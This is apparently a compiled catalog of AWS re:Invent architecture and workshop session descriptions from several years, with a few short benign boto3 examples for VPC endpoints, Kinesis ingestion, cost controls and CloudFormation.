          ARC211 - Solve common problems with ready to use solutions in 5 minutes or less
          Regularly, customers at AWS assign resources to create solutions that address common problems shared between businesses of all sizes. Often, this results in taking resources away from products or services that truly differentiate the business in the marketplace. The Solutions Builder team at AWS focuses on developing and publishing a catalog of repeatable, standardized solutions that can be rapidly deployed by customers to overcome common business challenges. In this session, the Solutions Builder team will share ready to use solutions that make it easy for anyone to create a transit VPC, centralized logging, a data lake, scheduling for Amazon EC2, and VPN monitoring. Along the way, the team reveals the architectural tenets and best practices they follow for the development of these solutions. In the end, customers are introduced to a catalog of freely available solutions with a peek into the architectural approaches used by an internal team at AWS.
          ARC212 - Salesforce: Helping Developers Deliver Innovations Faster
          Salesforce is one of the most innovative enterprise software companies in the world, delivering 3 major releases a year with hundreds of features in each release. In this session, come learn how we enable thousands of engineers within Salesforce to utilize a flexible development environment to deliver these innovations to our customers faster. We show you how we enable engineers at Salesforce to test not only individual services they are developing but also large scale service integrations. Also learn how we can achieve setup of a representative production environment in minutes and teardown in seconds, using AWS.
          ARC213 - Open Source at AWS—Contributions, Support, and Engagement
          Over the last few years, we have seen a dramatic increase in the use of open source projects as the mainstay of architectures in both startups and enterprises. Many of our customers and partners also run their own open source programs and contribute key technologies to the industry as a whole (see DCS201). At AWS we engage with open source projects in a number of ways. We contribute bug fixes and enhancements to popular projects including our work with the Hadoop ecosystem (see BDM401), Chromium (see BAP305) and (obviously) Boto. We have our own standalone projects including the security library s2n (see NET405) and machine learning project MXnet (see MAC401). We also have services that make open source easier to use like ECS for Docker (see CON316), and RDS for MySQL and PostgreSQL (see DAT305). In this session you will learn about our existing open source work across AWS, and our next steps.
          ARC301 - Architecting Next Generation SaaS Applications on AWS
          AWS provides a broad array of services, tools, and constructs that can be used to design, operate, and deliver SaaS applications. In this session, Tod Golding, the AWS Partner Solutions Architect, shares the wisdom and lessons learned from working with dozens of customers and partners building SaaS solutions on AWS. We discuss key architectural strategies and patterns that are used to deliver multi-tenant SaaS models on AWS and dive into the full spectrum of SaaS design and architecture considerations, including tenant isolation models, tenant identity management, serverless SaaS, and multi-tenant storage strategies. This session connects the dots between general SaaS best practices and what it means to realize these patterns on AWS, weighing the architectural tradeoffs of each model and assessing its influence on the agility, manageability, and cost profile of your SaaS solution.
          ARC302 - From One to Many: Evolving VPC Design
          As more customers adopt Amazon VPC architectures, the features and flexibility of the service are squaring off against evolving design requirements. This session follows this evolution of a single regional VPC into a multi-VPC, multi-region design with diverse connectivity into on-premises systems and infrastructure. Along the way, we investigate creative customer solutions for scaling and securing outbound VPC traffic, securing private access to Amazon S3, managing multi-tenant VPCs, integrating existing customer networks through AWS Direct Connect, and building a full VPC mesh network across global regions.
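          As a rough illustration of one of these patterns, securing private access to Amazon S3 is commonly done with a gateway VPC endpoint. The boto3 sketch below is an assumed, minimal example and is not taken from the session; the region, VPC ID, and route table ID are placeholders.

          import boto3

          # Create a gateway endpoint so instances in the VPC can reach S3 without
          # traversing the public internet. All IDs below are placeholders.
          ec2 = boto3.client("ec2", region_name="us-east-1")
          response = ec2.create_vpc_endpoint(
              VpcId="vpc-0123456789abcdef0",
              ServiceName="com.amazonaws.us-east-1.s3",
              RouteTableIds=["rtb-0123456789abcdef0"],
          )
          print(response["VpcEndpoint"]["VpcEndpointId"])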
          ARC303 - Cloud Monitoring - Understanding, Preparing, and Troubleshooting Dynamic Apps on AWS
          Applications running in a typical data center are static entities. Dynamic scaling and resource allocation are the norm in AWS. Technologies such as Amazon EC2, Docker, AWS Lambda, and Auto Scaling make tracking resources and resource utilization a challenge. The days of static server monitoring are over. In this session, we examine trends we've observed across thousands of customers using dynamic resource allocation and discuss why dynamic infrastructure fundamentally changes your monitoring strategy. We discuss some of the best practices we've learned by working with New Relic customers to build, manage, and troubleshoot applications and dynamic cloud services. Session sponsored by New Relic. AWS Competency Partner
          ARC304 - Effective Application Data Analytics for Modern Applications
          IT is evolving from a cost center to a source of continuous innovation for business. At the heart of this transition are modern, revenue-generating applications, based on dynamic architectures that constantly evolve to keep pace with end-customer demands. This dynamic application environment requires a new, comprehensive approach to monitoring: one based on real-time, end-to-end visibility and analytics across the entire application lifecycle and stack, instead of piecemeal monitoring. This presentation highlights practical advice on how developers and operators can leverage data and analytics to glean critical information about their modern applications. In this session, we will cover the types of data important for today's modern applications. We'll discuss visibility and analytics into data sources such as AWS services (e.g., Amazon CloudWatch, AWS Lambda, VPC Flow Logs, Amazon EC2, Amazon S3, etc.), development tool chain, and custom metrics, and describe how to use analytics to understand business performance and behaviors. We discuss a comprehensive approach to monitoring, troubleshooting, and customer usage insights, provide examples of effective data analytics to improve software quality, and describe an end-to-end customer use case that highlights how analytics applies to the modern app lifecycle and stack. Session sponsored by Sumo Logic. AWS Competency Partner
          ARC305 - From Monolithic to Microservices: Evolving Architecture Patterns in the Cloud
          Gilt, a global e-commerce company, implemented a sophisticated microservices architecture on AWS to handle millions of customers visiting their site at noon every day. The microservices architecture pattern enables independent service scaling, faster deployments, better fault isolation, and graceful degradation. In this session, Emerson Loureiro, Sr. Software Engineer at Gilt, will share Gilt's experiences and lessons learned during their evolution from a single monolithic Rails application in a traditional data center to more than 300 Scala/Java microservices deployed in the cloud. Derek Chiles, AWS Solutions Architect, will review best practices and recommended architectures for deploying microservices on AWS.
          ARC306 - Event Handling at Scale: Designing an Auditable Ingestion and Persistence Architecture for 10K+ events/second
          How does McGraw-Hill Education use the AWS platform to scale and reliably receive 10,000 learning events per second? How do we provide near-real-time reporting and event-driven analytics for hundreds of thousands of concurrent learners in a reliable, secure, and auditable manner that is cost effective? MHE designed and implemented a robust solution that integrates Amazon API Gateway, AWS Lambda, Amazon Kinesis, Amazon S3, Amazon Elasticsearch Service, Amazon DynamoDB, HDFS, Amazon EMR, Amazon EC2, and other technologies to deliver this cloud-native platform across the US and soon the world. This session describes the challenges we faced, architecture considerations, how we gained confidence for a successful production roll-out, and the behind-the-scenes lessons we learned.
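          As a hedged sketch of one stage of this kind of ingestion pipeline (not MHE's actual implementation), the following AWS Lambda handler forwards an API Gateway proxy request into an Amazon Kinesis stream; the stream name and event fields are assumptions for illustration only.

          import json
          import boto3

          kinesis = boto3.client("kinesis")

          def handler(event, context):
              # API Gateway (proxy integration) delivers the payload as a JSON string.
              body = json.loads(event.get("body") or "{}")
              kinesis.put_record(
                  StreamName="learning-events",                        # hypothetical stream name
                  Data=json.dumps(body).encode("utf-8"),
                  PartitionKey=str(body.get("learnerId", "unknown")),  # spreads load across shards
              )
              return {"statusCode": 202, "body": json.dumps({"accepted": True})}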
          ARC307 - Accelerating Next Generation Healthcare Business on the AWS Cloud
          Hear Geneia's design principles for using multiple technologies like Elastic Load Balancing and Auto Scaling in end-to-end solutions to meet regulatory requirements. Explore how to meet HIPAA regulations by using native cloud services like Amazon EC2, Amazon EBS volumes, encryption services, and monitoring features in addition to third-party tools to ensure end-to-end data protection, privacy, and security for protected health information (PHI) data hosted in the AWS Cloud. Learn how Geneia leveraged multiregion and multizone backup and disaster recovery solutions to address the recovery time objective (RTO) and recovery point objective (RPO) requirements. Discover how automated build, deployment, provisioning, and virtual workstations in the cloud enabled Geneia's developers and data scientists to quickly provision resources and work from any location, expediting the onboarding of customers, getting to market faster, and capturing bigger market share in healthcare analytics while minimizing costs. Session sponsored by Cognizant. AWS Competency Partner
          ARC308 - Metering Big Data at AWS: From 0 to 100 Million Records in 1 Second
          Learn how AWS processes millions of records per second to support accurate metering across AWS and our customers. This session shows how we migrated from traditional frameworks to AWS managed services to support a large processing pipeline. You will gain insights on how we used AWS services to build a reliable, scalable, and fast processing system using Amazon Kinesis, Amazon S3, and Amazon EMR. Along the way we dive deep into use cases that deal with scaling and accuracy constraints. Attend this session to see AWS's end-to-end solution that supports metering at AWS.
          ARC309 - Moving Mission Critical Apps from One Region to Multi-Region active/active
          In gaming, low latencies and connectivity are bare minimum expectations users have while playing online on PlayStation Network. Alex and Dustin share key architectural patterns to provide low latency, multi-region services to global users. They discuss the testing methodologies and how to programmatically map out the dependencies of a large multi-region deployment with data-driven techniques. The patterns shared show how to adapt to changing bottlenecks and sudden spikes of several million requests. You'll walk away with several key architectural patterns that can service users at global scale while being mindful of costs.
          ARC310 - Cost Optimizing Your Architecture: Practical Design Steps For Big Savings
          Did you know that AWS enables builders to architect solutions for price? Beyond the typical challenges of function, performance, and scale, you can make your application cost effective. Using different architectural patterns and AWS services in concert can dramatically reduce the cost of systems operation and per-transaction costs. This session uses practical examples aimed at architects and developers. Using code and AWS CloudFormation in concert with services such as Amazon EC2, Amazon ECS, Lambda, Amazon RDS, Amazon SQS, Amazon SNS, Amazon S3, CloudFront, and more, we demonstrate the financial advantages of different architectural decisions. Attendees will walk away with concrete examples, as well as a new perspective on how they can build systems economically and effectively. Attendees at this session will receive a free 30-day trial of AWS Trusted Advisor.
          ARC311 - Evolving a Responsive and Resilient Architecture to Analyze Billions of Metrics
          Nike+ is at the core of the Nike digital product ecosystem, providing services to enhance your athletic experience through quantified activity tracking and gamification. As one of the first movers at Nike to migrate out of the datacenter to AWS, they share the evolution in building a reactive platform on AWS to handle large, complex data sets. They provide a deep technical view of how they process billions of metrics a day in their quantified-self platform, supporting millions of customers worldwide. You'll leave with ideas and tools to help your organization scale in the cloud. Come learn from experts who have built an elastic platform using Java, Scala, and Akka, leveraging the power of many AWS technologies like Amazon EC2, ElastiCache, Amazon SQS, Amazon SNS, DynamoDB, Amazon ES, Lambda, Amazon S3, and a few others that helped them (and can help you) get there quickly.
          ARC312 - Compliance Architecture: How Capital One Automates the Guard Rails for 6,000 Developers
          What happens when you give 6,000 developers access to the cloud? Introducing Cloud Custodian, an open source project from Capital One, which provides a DSL for AWS fleet management that operates in real time using CloudWatch Events and Lambda. Cloud Custodian is used for the gamut of compliance, encryption, and cost optimization. What can it do for you?
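          Cloud Custodian itself is driven by YAML policies, but the kind of guard rail it automates can be illustrated with a plain boto3 check. This assumed sketch simply lists unencrypted EBS volumes, the sort of finding a compliance rule would act on; it is not Custodian code.

          import boto3

          ec2 = boto3.client("ec2")

          # Page through all EBS volumes whose "encrypted" flag is false.
          paginator = ec2.get_paginator("describe_volumes")
          for page in paginator.paginate(Filters=[{"Name": "encrypted", "Values": ["false"]}]):
              for volume in page["Volumes"]:
                  print("Unencrypted volume:", volume["VolumeId"])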
          ARC313 - Running Lean Architectures: How to Optimize for Cost Efficiency
          Whether you're a cash-strapped startup or an enterprise optimizing spend, it pays to run cost-efficient architectures on AWS. This session reviews a wide range of cost planning, monitoring, and optimization strategies, featuring real-world experience from AWS customers. We cover how to effectively combine Amazon EC2 On-Demand, Reserved, and Spot instances to handle different use cases; leveraging Auto Scaling to match capacity to workload; choosing the optimal instance type through load testing; taking advantage of Multi-AZ support; and using Amazon CloudWatch to monitor usage and automatically shut off resources when they are not in use. We discuss taking advantage of tiered storage and caching, offloading content to Amazon CloudFront to reduce back-end load, and getting rid of your back end entirely by leveraging AWS high-level services. We also showcase simple tools to help track and manage costs, including Cost Explorer, billing alerts, and AWS Trusted Advisor. This session is your pocket guide for running cost effectively in the Amazon Cloud. Attendees of this session receive a free 30-day trial of enterprise-level Trusted Advisor.
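          One concrete form of the "shut off resources when they are not in use" advice is a scheduled job that stops instances whose recent CPU utilization is negligible. The sketch below is an assumed example; the instance ID, one-day look-back window, and 5 percent threshold are illustrative choices, not guidance from the session.

          import datetime
          import boto3

          cloudwatch = boto3.client("cloudwatch")
          ec2 = boto3.client("ec2")

          INSTANCE_ID = "i-0123456789abcdef0"   # placeholder instance
          now = datetime.datetime.utcnow()

          # Pull hourly average CPU for the last 24 hours.
          stats = cloudwatch.get_metric_statistics(
              Namespace="AWS/EC2",
              MetricName="CPUUtilization",
              Dimensions=[{"Name": "InstanceId", "Value": INSTANCE_ID}],
              StartTime=now - datetime.timedelta(days=1),
              EndTime=now,
              Period=3600,
              Statistics=["Average"],
          )
          hourly_averages = [point["Average"] for point in stats["Datapoints"]]
          if hourly_averages and max(hourly_averages) < 5.0:
              # Looks idle for the whole day: stop it to save cost.
              ec2.stop_instances(InstanceIds=[INSTANCE_ID])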
          ARC314 - Enabling Enterprise Migrations: Creating an AWS Landing Zone
          With customers migrating workloads to AWS, we are starting to see a need for the creation of a prescribed landing zone, which uses native AWS capabilities and meets or exceeds customers' security and compliance objectives. In this session, we will describe an AWS landing zone and will cover solutions for account structure, user configuration, provisioning, networking and operation automation. This solution is based on AWS native capabilities such as AWS Service Catalog, AWS Identity and Access Management, AWS Config Rules, AWS CloudTrail and AWS Lambda. We will provide an overview of AWS Service Catalog and how it can be used to provide self-service infrastructure to application users, including various options for automation. After this session you will be able to configure an AWS landing zone for successful large scale application migrations. Additionally, Philips will explain their cloud journey and how they have applied their guiding principles when building their landing zone.
          ARC315 - The Enterprise Fast Lane - What Your Competition Doesn't Want You To Know About Enterprise Cloud Transformation
          Fed up with stop and go in your data center? Shift into overdrive and pull into the fast lane! Learn how AutoScout24, the largest online car marketplace Europe-wide, is building their Autobahn in the Cloud. The secret ingredient? Culture! Because Cloud is only one half of the digital transformation story: The other half is how your organization deals with cultural change as you transition from the old world of IT into building microservices on AWS with agile DevOps teams in a true "you build it, you run it" fashion. Listen to stories from the trenches, powered by Amazon Kinesis, Amazon DynamoDB, AWS Lambda, Amazon ECS, Amazon API Gateway and much more, backed by AWS Partners, AWS Professional Services, and AWS Enterprise Support. Key takeaways: How to become Cloud native, evolve your architecture step by step, drive cultural change across your teams, and manage your company's transformation for the future.
          ARC316 - Hybrid IT: A Stepping Stone to All-In
          This session demonstrates how customers can leverage hybrid IT as a transitional step on the path to going all-in on AWS. We provide a step-by-step walk-through focusing on seamless migration to the cloud, with consideration given to existing data centers, equipment, and staff retraining. Learn about the suite of capabilities AWS provides to ease and simplify your journey to the cloud.
          ARC318 - Busting the Myth of Vendor Lock-In: How D2L Embraced the Lock and Opened the Cage
          When D2L first moved to the cloud, we were concerned about being locked-in to one cloud provider. We were compelled to explore the opportunities of the cloud, so we overcame our perceived risk, and turned it into an opportunity by self-rolling tools and avoiding AWS native services. In this session, you learn how D2L tried to bypass the lock but eventually embraced it and opened the cage. Avoiding AWS native tooling and pure lifts of enterprise architecture caused a drastic inflation of costs. Learn how we shifted away from a self-rolled lift into an efficient and effective shift while prioritizing cost, client safety, AND speed of development. Learn from D2L's successes and missteps, and convert your own enterprise systems into the cloud both through native cloud births and enterprise conversions. This session discusses D2L's use of Amazon EC2 (with a guest appearance by Reserved Instances), Elastic Load Balancing, Amazon EBS, Amazon DynamoDB, Amazon S3, AWS CloudFormation, AWS CloudTrail, Amazon CloudFront, AWS Marketplace, Amazon Route 53, AWS Elastic Beanstalk, and Amazon ElastiCache.
          ARC319 - Datapipe Open Source: Image Development Pipeline
          For an IT organization to be successful in rapid cloud assessment or iterative migration of their infrastructure and applications to AWS, they need to effectively plan and execute on a strategic cloud strategy that focuses not only on cloud, but also big data, DevOps, and security. Session sponsored by Datapipe. AWS Competency Partner
          ARC320 - Workshop: AWS Professional Services Effective Architecting Workshop
          The AWS Professional Services team will be facilitating an architecture workshop exercise for certified AWS Architects. Class size will be limited to 48. This workshop will be a highly interactive architecture design exercise where the class will be randomly divided into teams and given a business case for which they will need to design an effective AWS solution. Past participants have found the interaction with people from other organizations and the creative brainstorming that occurs across 6 different teams greatly enhances the learning experience. Flipcharts will be provided and students are encouraged to bring their laptops to document their designs. Each team will be expected to present their solution to the class.
          ARC402 - Serverless Architectural Patterns and Best Practices
          As serverless architectures become more popular, AWS customers need a framework of patterns to help them deploy their workloads without managing servers or operating systems. This session introduces and describes four re-usable serverless patterns for web apps, stream processing, batch processing, and automation. For each, we provide a TCO analysis and comparison with its server-based counterpart. We also discuss the considerations and nuances associated with each pattern and have customers share similar experiences. The target audience is architects, system operators, and anyone looking for a better understanding of how serverless architectures can help them save money and improve their agility.
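          For readers unfamiliar with the web app pattern referenced here, a minimal sketch looks something like the handler below: API Gateway proxies a request to AWS Lambda, which reads from a DynamoDB table. The table name and key shape are assumptions for illustration, not material from the session.

          import json
          import boto3

          table = boto3.resource("dynamodb").Table("items")   # hypothetical table

          def handler(event, context):
              # Path parameter "id" identifies the item to fetch.
              item_id = (event.get("pathParameters") or {}).get("id")
              result = table.get_item(Key={"id": item_id})
              return {
                  "statusCode": 200 if "Item" in result else 404,
                  "headers": {"Content-Type": "application/json"},
                  "body": json.dumps(result.get("Item", {}), default=str),
              }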
          ARC403 - Building a Microservices Gaming Platform for Turbine Mobile Games
          Warner Bros.' Turbine team shares lessons learned from their enhanced microservices game platform, which uses Docker, Amazon EC2, Elastic Load Balancing, and Amazon ElastiCache to scale up in anticipation of massive game adoption. Learn about their Docker-based microservices architecture, tuned and optimized to support the demands of the massively popular Batman: Arkham Underworld and other franchises. Turbine simplified its microservices persistence layer by consolidating their previous NoSQL database solution onto highly performant PostgreSQL on Amazon EC2 and Amazon EBS. Turbine also describes other innovative strategies, including integrated analytic techniques to anticipate and predict their scaling operations.
          ARC404 - Migrating a Highly Available and Scalable Database from Oracle to Amazon DynamoDB

          WRK307 - A Well-Architected Workshop: Working with the AWS Well-Architected Framework
          This workshop describes the AWS Well-Architected Framework, which enables customers to assess and improve their cloud architectures and better understand the business impact of their design decisions. It addresses general design principles, best practices, and guidance in four pillars of the Well-Architected Framework.  We will work in teams, assisted by AWS Solutions Architects, to review an example architecture, identifying issues, and how to improve the system.  You will need to have architecture experience to get the most from this workshop. After attending this workshop you will be able to review an architecture and identify potential issues across the four pillars of Well-Architected: security, performance efficiency, reliability, and cost optimization. Prerequisites: Architecture experience.  Optional - review the AWS Well-Architected Framework whitepaper. Capacity: To encourage the interactive nature of this workshop, the session capacity is limited to approximately 70 attendees.  Attendance is based on a first come, first served basis once onsite.  Scheduling tools in the session catalog are for planning purposes only.
          WRK306 - AWS Professional Services Architecting Workshop
          The AWS Professional Services team will be facilitating an architecture workshop exercise for certified AWS architects, with a class size limited to 40. In this highly interactive architecture design exercise, the class will be randomly divided into teams and given a business case for which to design an effective AWS solution. Flipcharts will be provided, and students are encouraged to bring their laptops to document their designs. Each team will be expected to present their solution to the class. Prerequisites: Participants should be certified AWS Architects.  Bring your laptop. Capacity: To encourage the interactive nature of this workshop, the session capacity is limited to approximately 40 attendees.  The session will be offered twice on October 7 and twice on October 8, using the same case study for each to allow for scheduling flexibility.   Attendance is based on a first come, first served basis once onsite.  Scheduling tools in the session catalog are for planning purposes only.
          ARC403 - From One to Many: Evolving VPC Design
          As more customers adopt Amazon VPC architectures, the features and flexibility of the service are squaring off against evolving design requirements. This session follows this evolution of a single regional VPC into a multi-VPC, multiregion design with diverse connectivity into on-premises systems and infrastructure. Along the way, we investigate creative customer solutions for scaling and securing outbound VPC traffic, securing private access to S3, managing multitenant VPCs, integrating existing customer networks through AWS Direct Connect and building a full VPC mesh network across global regions.
          ARC402 - Double Redundancy with AWS Direct Connect
          AWS Direct Connect provides low latency and high performance connectivity to the AWS cloud by allowing the provision of physical fiber from the customer's location or data center into AWS Direct Connect points of presence. This session covers design considerations around AWS Direct Connect solutions. We will discuss how to design and configure physical and logical redundancy using both physically redundant fibers and logical VPN connectivity, and includes a live demo showing both the configuration and the failure of a doubly redundant connectivity solution. This session is for network engineers/architects, technical professionals, and infrastructure managers who have a working knowledge of Amazon VPC, Amazon EC2, general networking, and routing protocols.
          ARC401 - Cloud First: New Architecture for New Infrastructure
          What do companies with internal platforms have to change to succeed in the cloud? The five pillars at the heart of IT solutions in the cloud are automation, fault tolerance, horizontal scalability, security, and cost-effectiveness. This talk discusses tools that facilitate the development and automate the deployment of secure, highly available microservices. The tools were developed using AWS CloudFormation, AWS SDKs, AWS CLI, Amazon RDS, and various open-source software such as Docker. The talk provides concrete examples of how these tools can help developers and architects move from beginning/intermediate AWS practitioners to cloud deployment experts.
          ARC348 - Seagull: How Yelp Built a Highly Fault-tolerant Distributed System for Concurrent Task Execution
          Efficiently parallelizing mutually exclusive tasks can be a challenging problem when done at scale. Yelp's recent in-house product, Seagull, demonstrates how an intelligent scheduling system can use several open-source products to provide a highly scalable and fault-tolerant distributed system. Learn how Yelp built Seagull with a variety of Amazon Web Services to concurrently execute thousands of tasks that can greatly improve performance. Seagull combines open-source software like ElasticSearch, Mesos, Docker, and Jenkins with Amazon Web Services (AWS) to parallelize Yelp's testing suite. Our current use case for Seagull involves running Yelp's test suite, which has over 55,000 test cases, in a distributed fashion. Using our smart scheduling, we can run one of our largest test suites to process 42 hours of serial work in less than 10 minutes using 200 r3.8xlarge instances from Amazon Elastic Compute Cloud (Amazon EC2). Seagull consumes and produces data at very high rates. On a typical day, Seagull writes 60 GB of data and consumes 20 TB of data. Although we are currently using Seagull to parallelize test execution, it can efficiently parallelize other types of independent tasks.
          ARC346-APAC - Scaling to 25 Billion Daily Requests Within 3 Months: Building a Global Big Data Distribution Platform on AWS (APAC track)
          What if you were told that within three months, you had to scale your existing platform from 1,000 req/sec (requests per second) to handle 300,000 req/sec with an average latency of 25 milliseconds? And that you had to accomplish this with a tight budget, expand globally, and keep the project confidential until officially announced by well-known global mobile device manufacturers? That's exactly what happened to us. This session explains how The Weather Company partnered with AWS to scale our data distribution platform to prepare for unpredictable global demand. We cover the many challenges that we faced as we worked on architecture design, technology and tools selection, load testing, deployment and monitoring, and how we solved these challenges using AWS. This is a repeat session that will be translated simultaneously into Japanese, Chinese, and Korean.
          ARC346 - Scaling to 25 Billion Daily Requests Within 3 Months: Building a Global Big Data Distribution Platform on AWS
          What if you were told that within three months, you had to scale your existing platform from 1,000 req/sec (requests per second) to handle 300,000 req/sec with an average latency of 25 milliseconds? And that you had to accomplish this with a tight budget, expand globally, and keep the project confidential until officially announced by well-known global mobile device manufacturers? That's exactly what happened to us. This session explains how The Weather Company partnered with AWS to scale our data distribution platform to prepare for unpredictable global demand. We cover the many challenges that we faced as we worked on architecture design, technology and tools selection, load testing, deployment and monitoring, and how we solved these challenges using AWS.
          ARC344 - How Intuit Improves Security and Productivity with AWS Virtual Networking, Identity, and Account Services
          Intuit has an "all in" strategy in adopting the AWS cloud. We have already moved some large workloads supporting some of our flagship products (TurboTax, Mint) and are expecting to launch hundreds of services in AWS over the coming years. To provide maximum flexibility for product teams to iterate on their services, as well as provide isolation of individual accounts from logical errors or malicious actions, Intuit is deploying every application into its own account and virtual private cloud (VPC). This talk discusses both the benefits and challenges of designing to run across hundreds or thousands of VPCs within an enterprise. We discuss the limitations of connectivity, sharing data, strategies for IAM access across accounts, and other nuances to keep in mind as you design your organization's migration strategy. We share our design patterns that can help guide your team in developing a plan for your AWS migration. This talk is helpful for anyone who is planning or in the process of moving a large enterprise to AWS and facing the difficult decisions and tradeoffs in structuring your deployment.
          ARC342 - Closing the Loop: Designing and Building an End-to-End Email Solution Using AWS
          Email continues to be a critical medium for communications between businesses and customers and remains an important channel for building automation around sending and receiving messages. Email automation enables use cases like updating a ticketing system or a forum via email, logging and auditing an email conversation, subscribing and unsubscribing from email lists via email, transferring small files via email, and updating email contents before delivery. This session implements and presents live code that covers a use case supported by Amazon.com's seller business: how to protect your customers' privacy by anonymizing email for third-party business-to-business communication on your platform. With Amazon SES and the help of Amazon S3, AWS Lambda, and Amazon DynamoDB, we cover architecture, walk through code as we build an application live, and present a demonstration of the final implementation.
          ARC340 - Multi-tenant Application Deployment Models
          Shared pools of resources? Microservices in containers? Isolated application stacks? You have many architectural models and AWS services to consider when you deploy applications on AWS. This session focuses on several common models and helps you choose the right path or paths to fit your application needs. Architects and operations managers should consider this session to help them choose the optimal path for their application deployment needs for their current and future architectures. This session covers services such as Amazon Elastic Compute Cloud (Amazon EC2), EC2 Container Services, AWS Lambda, and AWS CodeDeploy.
          ARC313 - Future Banks Live in the Cloud: Building a Usable Cloud with Uncompromising Security
          Running today's largest consumer bitcoin startup comes with a target on your back and requires an uncompromising approach to security. This talk explores how Coinbase is learning from the past and pulling out all the stops to build a secure infrastructure behind an irreversibly transferrable digital good for millions of users. This session will cover cloud architecture, account and network isolation in the AWS cloud, disaster recovery, self-service consensus-based deployment, real-time streaming insight, and how Coinbase is leveraging practical DevOps to build the bank of the future.
          ARC311 - Decoding the Genetic Blueprint of Life on a Cloud Connected Ecosystem
          Thermo Fisher Scientific, a world leader in biotechnology, has built a new polymerase chain reaction (PCR) system for DNA sequencing. Designed for low- to midlevel throughput laboratories that conduct real time PCR experiments, the system runs on individual QuantStudio devices. These devices are connected to Thermo Fisher's cloud computing platform, which is built on AWS using Amazon EC2, Amazon DynamoDB, and Amazon S3. With this single platform, applied and clinical researchers can learn, analyze, share, collaborate, and obtain support. Researchers worldwide can now collaborate online in real time and access their data wherever and whenever necessary. Laboratories can also share experimental conditions and results with their partners while providing a uniform experience for every user and helping to minimize training and errors. The net result is increased collaboration, faster time to market, fewer errors, and lower cost. We have architected a solution that uses Amazon EMR, DynamoDB, Amazon ElastiCache, and S3. In this presentation, we share our architecture, lessons learned, best design patterns for NoSQL, strategies for leveraging EMR with DynamoDB, and a flexible solution that our scientists use. We also share our next step in architecture evolution.
          ARC310-APAC - Amazon.com: Solving Amazon's Catalog Contention and Cost with Amazon Kinesis (APAC track)
          The Amazon.com product catalog receives millions of updates each hour across billions of products, and many of the updates involve comparatively few products. In this...
          ARC310 - Amazon.com: Solving Amazon's Catalog Contention and Cost with Amazon Kinesis
          The Amazon.com product catalog receives millions of updates an hour across billions of products with many of the updates concentrated on comparatively few products. In this session, hear how Amazon.com has used Amazon Kinesis to build a pipeline orchestrator that provides sequencing, optimistic batching, and duplicate suppression whilst at the same time significantly lowering costs. This session covers the architecture of that solution and draws out the key enabling features that Amazon Kinesis provides. This talk is intended for those who are interested in learning more about the power of the distributed log and understanding its importance for enabling OLTP just as DHT is for storage.
          ARC309 - From Monolithic to Microservices: Evolving Architecture Patterns in the Cloud
          Gilt, a billion-dollar e-commerce company, implemented a sophisticated microservices architecture on AWS to handle millions of customers visiting their site at noon every day. The microservices architecture pattern enables independent service scaling, faster deployments, better fault isolation, and graceful degradation. In this session, Derek Chiles, AWS solutions architect, will review best practices and recommended architectures for deploying microservices on AWS. Adrian Trenaman, SVP of engineering at Gilt, will share Gilt's experiences and lessons learned during their evolution from a single monolithic Rails application in a traditional data center to more than 300 Scala/Java microservices deployed in the cloud.
          ARC308-APAC - The Serverless Company with AWS Lambda: Streamlining Architecture with AWS (APAC track)
          In today's competitive environment, startups are increasingly focused on eliminating any undifferentiated heavy lifting. Come learn about various architectural patterns for building scalable, function-rich data processing systems using AWS Lambda and other AWS managed services. Find out how PlayOn! Sports went from a multi-layered architecture for video streaming to a streamlined and serverless system by using AWS Lambda and Amazon S3. This is a repeat session that will be translated simultaneously into Japanese, Chinese, and Korean.
          ARC308 - The Serverless Company Using AWS Lambda: Streamlining Architecture with AWS
          In today's competitive environment, startups are increasingly focused on eliminating any undifferentiated heavy lifting. Come learn about various architectural patterns for building scalable, function-rich data processing systems using AWS Lambda and other AWS managed services. Come see how PlayOn! Sports went from a multi-layered architecture for video streaming to a streamlined and serverless system using Lambda and Amazon S3.
          ARC307 - Infrastructure as Code
          While many organizations have started to automate their software development processes, many still engineer their infrastructure largely by hand. Treating your infrastructure just like any other piece of code creates a “programmable infrastructure” that allows you to take full advantage of the scalability and reliability of the AWS cloud. This session will walk through practical examples of how AWS customers have merged infrastructure configuration with application code to create application-specific infrastructure and a truly unified development lifecycle. You will learn how AWS customers have leveraged tools like CloudFormation, orchestration engines, and source control systems to enable their applications to take full advantage of the scalability and reliability of the AWS cloud, create self-reliant applications, and easily recover when things go seriously wrong with their infrastructure.
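          As a small, assumed illustration of treating infrastructure as code, the same API a deployment pipeline would call can create a stack from a versioned template. The template here is deliberately tiny (a single S3 bucket) and the stack name is a placeholder; it is not an example from the session.

          import json
          import boto3

          # A minimal template kept in source control alongside application code.
          template = {
              "AWSTemplateFormatVersion": "2010-09-09",
              "Resources": {"ArtifactBucket": {"Type": "AWS::S3::Bucket"}},
          }

          cloudformation = boto3.client("cloudformation")
          cloudformation.create_stack(
              StackName="demo-infrastructure",          # placeholder stack name
              TemplateBody=json.dumps(template),
          )
          # Block until CloudFormation reports the stack as created.
          cloudformation.get_waiter("stack_create_complete").wait(StackName="demo-infrastructure")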
          ARC305 - Self-service Cloud Services: How J&J Is Managing AWS at Scale for Enterprise Workloads
          Johnson & Johnson is a global health care leader with 270 operating companies in 60 countries. Operating at this scale requires a decentralized model that supports the autonomy of the different companies under the J&J umbrella, while still allowing knowledge and infrastructure frameworks to be shared across the different businesses. To address this problem, J&J created an Amazon VPC, which provides simplified architecture patterns that J&J's application teams leveraged throughout the company using a self-service model while adhering to critical internal controls. Hear how J&J leveraged Amazon S3, Amazon Redshift, Amazon RDS, Amazon DynamoDB, and Amazon Kinesis to develop these architecture patterns for various use cases, allowing J&J's businesses to use AWS for its agility while still adhering to all internal policies automatically. Learn how J&J uses this model to build advanced analytic platforms to ingest large streams of structured and unstructured data, which minimizes the time to insight in a variety of areas, including physician compliance, bioinformatics, and supply chain management.
          ARC304 - Designing for SaaS: Next-Generation Software Delivery Models on AWS
          SaaS architectures can be deployed onto AWS in a number of ways, and each optimizes for different factors, from security to cost optimization. Come learn more about common deployment models used on AWS for SaaS architectures and how each of those models is tuned for customer-specific needs. We will also review options and tradeoffs for common SaaS architectures, including cost optimization, resource optimization, performance optimization, and security and data isolation.
          ARC303 - Pure Play Video OTT: A Microservices Architecture in the Cloud
